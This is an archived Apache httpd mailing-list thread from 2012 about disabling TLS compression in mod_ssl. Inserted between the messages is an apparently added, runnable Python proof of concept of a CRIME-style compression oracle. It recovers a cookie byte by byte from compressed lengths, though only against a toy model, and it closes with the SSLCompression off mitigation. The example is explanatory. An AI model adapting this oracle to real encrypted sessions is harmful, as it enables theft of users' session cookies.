Re: [Bug 53219] mod_ssl should allow to disable ssl compression

2012-10-08 Thread Stefan Fritsch
On Monday 08 October 2012, Roy T. Fielding wrote:
> On Oct 7, 2012, at 6:05 PM, Eric Covener wrote:
> > Any opinions on the default change?  AIUI current maintenance of
> > browsers have disabled TLS compression already, because they can
> > be driven to generate arbitrary traffic that eventually reveals
> > httpOnly session cookies.
>
> Just disable it completely -- adaptive compression of headers is
> inherently incompatible with the goals of TLS.

Is it? I think the main problem is the broken security model of web 
browsers. There are many scenarios where compression does not hurt, 
e.g. with non-browser clients that do not allow chosen plaintext 
attacks, or if authentication is done by client certificate and not by 
header.

Therefore, I would prefer leaving the option available. But defaulting 
to off makes sense.

Cheers,
Stefan
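The attack Eric Covener alludes to above (the technique published as CRIME, a compression side channel against TLS) and the chosen-plaintext condition Stefan's reply depends on can be shown in a few lines of Python. This is an added example, not code from the thread or from httpd: the request layout, the cookie value and the pad bytes are constructed here, and zlib is forced to its fixed Huffman trees (Z_FIXED) so that the length arithmetic in the comments is exact rather than merely typical.

```python
"""CRIME-style compression oracle (added toy example, not httpd code).

Models what an on-path attacker sees when TLS-level DEFLATE compression is
applied to an HTTP request that mixes bytes the attacker chooses (the URL
path, e.g. via an injected <img> in a browser) with a secret the browser
appends on its own (a cookie).  The attacker cannot read the ciphertext, but
the length of each TLS record is visible and tracks the compressed size.
"""
import string
import zlib

# Constructed victim state: the cookie the browser attaches to every request.
# The value is made up for this example.
SECRET_COOKIE = b"session=7f3a9c"

ALPHABET = (string.ascii_lowercase + string.digits).encode()


def build_request(path: bytes, cookie: bytes = SECRET_COOKIE) -> bytes:
    """Plaintext the client hands to the TLS layer: attacker-chosen path,
    fixed headers, and the secret cookie (constructed, not captured traffic)."""
    return (b"GET /" + path + b" HTTP/1.1\r\n"
            b"Host: example.com\r\n"
            b"Cookie: " + cookie + b"\r\n\r\n")


def wire_length(path: bytes) -> int:
    """What an observer learns: the compressed record length.

    Z_FIXED forces static Huffman codes, so every ASCII literal costs 8 bits
    (9 bits for byte values >= 0x90) and a back-reference of length 3..10
    costs 7 bits, which makes the reasoning in recover_secret() exact.  With
    zlib's default strategy the leak is the same, only noisier."""
    co = zlib.compressobj(9, zlib.DEFLATED, 15, 9, zlib.Z_FIXED)
    return len(co.compress(build_request(path)) + co.flush())


# Pad bytes >= 0x90 cost 9 bits each under fixed Huffman, so 0..7 of them walk
# the bit stream through all eight alignments.  Summing the sizes over them
# removes the byte rounding that could otherwise hide a 7- or 8-bit saving.
PADS = [bytes(range(0xA0, 0xA0 + k)) for k in range(8)]


def oracle(guess: bytes) -> int:
    """Total compressed size of a guessed path over all pad alignments."""
    return sum(wire_length(guess + b"?" + pad) for pad in PADS)


def recover_secret(prefix: bytes = b"session=", length: int = 6,
                   alphabet: bytes = ALPHABET) -> bytes:
    """Recover `length` secret bytes that follow a known prefix.

    The cookie is encoded as a back-reference to the copy of the prefix in
    the attacker's path.  A correct guess extends that match by one byte and
    removes one literal from the output; every wrong guess costs the same
    extra literal, so the correct byte is the unique smallest oracle value."""
    known = prefix
    for _ in range(length):
        scores = {bytes([c]): oracle(known + bytes([c])) for c in alphabet}
        known += min(scores, key=scores.get)
    return known[len(prefix):]


if __name__ == "__main__":
    print(recover_secret())
```

The condition that makes this work is exactly the one Stefan's reply calls out: the attacker must get chosen bytes compressed in the same context as the secret. A client that never compresses attacker-influenced data next to its credential, or that authenticates with a client certificate instead of a header, gives the observer only a constant length and nothing to search over. On the server side the fix under discussion is the mod_ssl `SSLCompression off` setting, which maps to OpenSSL's `SSL_OP_NO_COMPRESSION`.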


Re: [Bug 53219] mod_ssl should allow to disable ssl compression

2012-10-07 Thread Roy T. Fielding
On Oct 7, 2012, at 6:05 PM, Eric Covener wrote:

> Any opinions on the default change?  AIUI current maintenance of
> browsers have disabled TLS compression already, because they can be
> driven to generate arbitrary traffic that eventually reveals httpOnly
> session cookies.

Just disable it completely -- adaptive compression of headers is
inherently incompatible with the goals of TLS.

Roy